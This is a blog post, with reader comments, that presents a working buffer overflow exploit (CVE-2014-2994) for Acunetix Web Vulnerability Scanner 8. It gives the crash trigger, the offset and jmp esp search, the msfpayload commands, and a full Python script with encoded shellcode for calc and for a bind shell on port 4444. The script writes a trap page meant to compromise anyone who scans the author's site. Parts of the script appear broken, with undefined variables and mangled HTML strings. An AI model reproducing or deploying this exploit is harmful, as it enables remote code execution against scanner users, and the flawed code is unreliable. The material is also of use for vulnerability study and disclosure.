Pwning Script Kiddies – Acunetix Buffer Overflow
Introduction
Recently a security researcher named “Danor Cohen – An7i” had found a buffer overflow vulnerability and he has written a nice exploit for Acunetix Web Vulnerability Scanner 8.0. As this exploit was an ascii based one I was interested in re-writing the exploit because my previous exploit was also an ascii based one. However with the emerging of bug bounties and responsible disclosure policies I’ve seen many people firing up web application security scanners against live hosts in which automated vulnerability assessments are not permitted at all. Well, by triggering this buffer overflow vulnerability we can have some fun owning the noobs 😉
Crash
When we submit a new website to be scanned by Acunetix it searches for html tags like <img src=”” >, <a href=””> to get the additional hosts from that website. So if we place an html tag in the page like
[code language=”html”]
<a href="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
[/code]
I first gave 1000 A chars to crash the app. I’ve created an html file with the above payload. Click “New Scan” and give the target and keep on clicking next until you get this dialog box.
Acunetix detects the http://AAAAAA as an external website under the Additional Hosts. Mark a tick on it and proceed forward 😉 The app will terminate. Let’s have a closer look with the debugger.
We can clearly see that the app takes only ascii printable chars as we are dealing with a URL string. We cannot inject ascii special chars wither like ‘ “ / # they get url encoded. So our character set would be something like 1-0 a-z A-Z and chars like ={}!()[]. Also we can see that the EDX register is overwritten with A chars.
We can see that the EIP is pointing to this memory location which says
[code language=”python”]
00405998 8B4A F8 MOV ECX,DWORD PTR DS:[EDX-8]
[/code]
The address in EDX-8 will be moved to the ECX register.
We need to anyhow fix the flow of the application. According to An7i he had found this address 0x66303035 = f005 which is ascii printable chars without any url encodes or bad chars 🙂
Building the Exploit
It’s time to start developing the exploit. I will be using python for the exploit. You can use whatever you like, the language doesn’t really matter. First let’s create a pattern and get the exact offset of the EDX register.
The EDX contains this value 6A413969. Let’s check the offset.
After 268 bytes we can write our address which will make the app flow in the EDX register. Yes! We were able to overwrite the EIP register. It is after 4 bytes. Next we can place our shellcode in the ESP register and pwn the system. But our jmp esp address should be in printable ascii chars.
Let’s find a printable ascii jmp esp address by using mona.
[code language=”python”]
!mona jmp -r esp -cp asciiprint
0x4d526349 : jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:\WINDOWS\system32\WINHTTP.dll)
[/code]
I will be using the address from “WINHTTP.dll” That address is equal to “MRcI” which is perfect for our exploit. For the payload we have to encode using the x86/alpha_mixed encoder. You can manually encode your payload like this
[code language=”python”]
ALPHA3.py esp –input="shellcode.bin"
[/code]
Or directly pipe msfencode to msfpayload and get our job done.
[code language=”python”]
msfpayload windows/exec cmd=calc EXITFUNC=thread R| msfencode -e x86/alpha_mixed -t python BufferRegister=ESP
[/code]
Final Exploit
[code language=”python”]
#!/usr/bin/python
# Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit
# Version: 8
# Build: 20120704
# Tested on: Windows XP SP2 en
# Vendor: http://www.acunetix.com/
# Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Exploit-Author: Osanda Malith
# Follow @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=RHaMx8K1GeM
# CVE: CVE-2014-2994
”’
Host the generated file in a server. The victim should select the external host. Otherwise we cannot trigger
the vulnerability.
”’
print (‘[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit\n’)
while True:
try:
choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n"))
except ValueError:
print "[!] Enter only a number"
continue
if choice == 1:
shellcode = ""
shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63"
shellcode += "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b"
shellcode += "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70"
shellcode += "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57"
shellcode += "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e"
shellcode += "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30"
shellcode += "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58"
shellcode += "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b"
shellcode += "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31"
shellcode += "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50"
shellcode += "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77"
shellcode += "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b"
shellcode += "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64"
shellcode += "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71"
shellcode += "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33"
shellcode += "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32"
shellcode += "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35"
shellcode += "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c"
shellcode += "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e"
shellcode += "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b"
shellcode += "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42"
shellcode += "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46"
shellcode += "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53"
shellcode += "\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b"
shellcode += "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45"
shellcode += "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d"
shellcode += "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65"
shellcode += "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b"
shellcode += "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61"
shellcode += "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53"
shellcode += "\x65\x50\x41\x41"
break
elif choice == 2:
# Modify this part with your own custom shellcode
# msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP
shellcode = ""
shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x4b\x58\x6c\x49\x65\x50\x73\x30\x73\x30\x31"
shellcode += "\x70\x6e\x69\x48\x65\x70\x31\x59\x42\x55\x34\x4c\x4b"
shellcode += "\x42\x72\x76\x50\x6c\x4b\x73\x62\x76\x6c\x4c\x4b\x53"
shellcode += "\x62\x57\x64\x6e\x6b\x63\x42\x34\x68\x66\x6f\x48\x37"
shellcode += "\x30\x4a\x54\x66\x55\x61\x79\x6f\x55\x61\x4b\x70\x4c"
shellcode += "\x6c\x35\x6c\x30\x61\x33\x4c\x75\x52\x64\x6c\x67\x50"
shellcode += "\x6f\x31\x5a\x6f\x54\x4d\x47\x71\x48\x47\x6b\x52\x38"
shellcode += "\x70\x61\x42\x46\x37\x6e\x6b\x32\x72\x66\x70\x6e\x6b"
shellcode += "\x73\x72\x75\x6c\x73\x31\x4e\x30\x6e\x6b\x71\x50\x43"
shellcode += "\x48\x4b\x35\x49\x50\x61\x64\x72\x6a\x33\x31\x78\x50"
shellcode += "\x76\x30\x4c\x4b\x77\x38\x35\x48\x6e\x6b\x53\x68\x61"
shellcode += "\x30\x65\x51\x5a\x73\x69\x73\x77\x4c\x50\x49\x4e\x6b"
shellcode += "\x56\x54\x6e\x6b\x45\x51\x69\x46\x75\x61\x6b\x4f\x66"
shellcode += "\x51\x49\x50\x6c\x6c\x4b\x71\x78\x4f\x56\x6d\x35\x51"
shellcode += "\x4a\x67\x50\x38\x59\x70\x61\x65\x39\x64\x67\x73\x31"
shellcode += "\x6d\x6a\x58\x45\x6b\x43\x4d\x76\x44\x50\x75\x49\x72"
shellcode += "\x52\x78\x6e\x6b\x61\x48\x46\x44\x43\x31\x68\x53\x45"
shellcode += "\x36\x4e\x6b\x34\x4c\x42\x6b\x6e\x6b\x73\x68\x35\x4c"
shellcode += "\x57\x71\x6b\x63\x4c\x4b\x53\x34\x6c\x4b\x43\x31\x4e"
shellcode += "\x30\x4e\x69\x32\x64\x47\x54\x56\x44\x73\x6b\x61\x4b"
shellcode += "\x75\x31\x31\x49\x72\x7a\x76\x31\x59\x6f\x59\x70\x61"
shellcode += "\x48\x51\x4f\x31\x4a\x6c\x4b\x52\x32\x78\x6b\x6e\x66"
shellcode += "\x43\x6d\x42\x48\x67\x43\x45\x62\x37\x70\x63\x30\x72"
shellcode += "\x48\x42\x57\x32\x53\x76\x52\x31\x4f\x42\x74\x50\x68"
shellcode += "\x52\x6c\x64\x37\x64\x66\x44\x47\x39\x6f\x69\x45\x4d"
shellcode += "\x68\x5a\x30\x65\x51\x57\x70\x63\x30\x76\x49\x59\x54"
shellcode += "\x31\x44\x52\x70\x45\x38\x64\x69\x4f\x70\x50\x6b\x57"
shellcode += "\x70\x59\x6f\x7a\x75\x52\x70\x52\x70\x32\x70\x52\x70"
shellcode += "\x47\x30\x30\x50\x67\x30\x66\x30\x63\x58\x48\x6a\x54"
shellcode += "\x4f\x49\x4f\x69\x70\x79\x6f\x4e\x35\x4c\x57\x45\x61"
shellcode += "\x6b\x6b\x51\x43\x73\x58\x73\x32\x57\x70\x34\x51\x73"
shellcode += "\x6c\x6f\x79\x4a\x46\x42\x4a\x76\x70\x46\x36\x50\x57"
shellcode += "\x71\x78\x7a\x62\x4b\x6b\x70\x37\x72\x47\x6b\x4f\x48"
shellcode += "\x55\x62\x73\x51\x47\x72\x48\x4c\x77\x78\x69\x47\x48"
shellcode += "\x4b\x4f\x69\x6f\x48\x55\x30\x53\x52\x73\x53\x67\x45"
shellcode += "\x38\x62\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x5a\x75"
shellcode += "\x72\x77\x6c\x57\x62\x48\x54\x35\x50\x6e\x32\x6d\x35"
shellcode += "\x31\x4b\x4f\x69\x45\x61\x7a\x77\x70\x32\x4a\x73\x34"
shellcode += "\x62\x76\x61\x47\x70\x68\x63\x32\x78\x59\x4a\x68\x31"
shellcode += "\x4f\x49\x6f\x48\x55\x6e\x6b\x46\x56\x51\x7a\x71\x50"
shellcode += "\x62\x48\x65\x50\x46\x70\x63\x30\x43\x30\x31\x46\x32"
shellcode += "\x4a\x55\x50\x71\x78\x31\x48\x49\x34\x66\x33\x6b\x55"
shellcode += "\x59\x6f\x4e\x35\x4f\x63\x72\x73\x71\x7a\x37\x70\x30"
shellcode += "\x56\x70\x53\x71\x47\x45\x38\x74\x42\x38\x59\x6f\x38"
shellcode += "\x33\x6f\x49\x6f\x69\x45\x67\x71\x79\x53\x76\x49\x6b"
shellcode += "\x76\x6f\x75\x48\x76\x62\x55\x58\x6c\x49\x53\x41\x41"
print "[+] Connect on port 4444"
break
else:
print "[-] Invalid Choice"
continue
head = ("\\</pre>
<center>
<h1>Scan This Site and Get Pwned :)</h1>
</center>
<pre>
")
junk = ("\
<a href="\"http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\">"
tail = ("<img src="\"http://i.imgur.com/BimAoR0.jpg\"" alt="" />\
</a>\
")
exploit = head + junk + edx + junk2 + eip + shellcode + tail
filename = "Exploit.htm"
file = open(filename, "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file"
#EOF
[/code]
http://pastie.org/9107965
The latest version 9 is not vulnerable. Don’t get pwned kiddies 😉
CVE-2014-2994
http://packetstormsecurity.com/files/126307/Acunetix-8-Scanner-Buffer-Overflow.html
SANS InfoSec Handlers Diary Blog:
https://isc.sans.edu/diary/Using+Security+Tools+to+Compromize+a+Network/21903
😮 (y) Great found bro .. (y)
Amazing bro. Very well detailed and explained. Keep it up. (Y)
great post man!
greate job bro.wel done
Great …
But Danor Cohen –> An7i Say
———————————————————————————————————–
well, I can tell you that, newer version’s are vulnerable too,I just I didn’t mention that in my article but I tested it myself. version 9 is the only one that isn’t vulnerable. 🙁
————————————————————————————————————-
My ? is
i can’t find v8 of Acunetix .. Can you Give Me Link Of Yours ? & is it Cracked ?
Thanks 4 Share 🙂
#